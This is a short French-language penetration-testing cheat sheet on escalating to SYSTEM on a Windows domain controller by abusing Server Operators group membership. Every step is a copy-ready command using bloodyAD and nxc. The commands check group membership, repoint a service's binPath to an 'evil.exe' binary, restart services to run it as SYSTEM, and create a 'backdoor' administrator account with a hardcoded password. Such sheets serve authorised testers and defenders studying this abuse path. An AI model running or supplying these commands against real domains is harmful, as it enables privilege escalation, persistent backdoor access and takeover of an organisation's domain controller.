Windows Privilege Escalation

Server Operators

Abus du groupe Server Operators pour modifier des services et obtenir SYSTEM sur le DC.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Server Operators'

Description: Vérifier l'appartenance au groupe Server Operators : peut démarrer/arrêter des services sur le DC.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc config $SERVICE binPath= "C:\Temp\evil.exe"'

Description: Modifier le binPath d'un service existant : Server Operators peut reconfigurer les services.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc stop $SERVICE && sc start $SERVICE'

Description: Redémarrer le service modifié pour exécuter notre binaire en tant que SYSTEM.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc config browser binPath= "cmd /c net user backdoor Pass123! /add" && sc start browser'

Description: Utiliser le service Browser (souvent arrêté) pour ajouter un admin sans affecter un service critique.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'net localgroup administrators backdoor /add'

Description: Vérifier que le compte backdoor créé est bien dans les admins locaux du DC.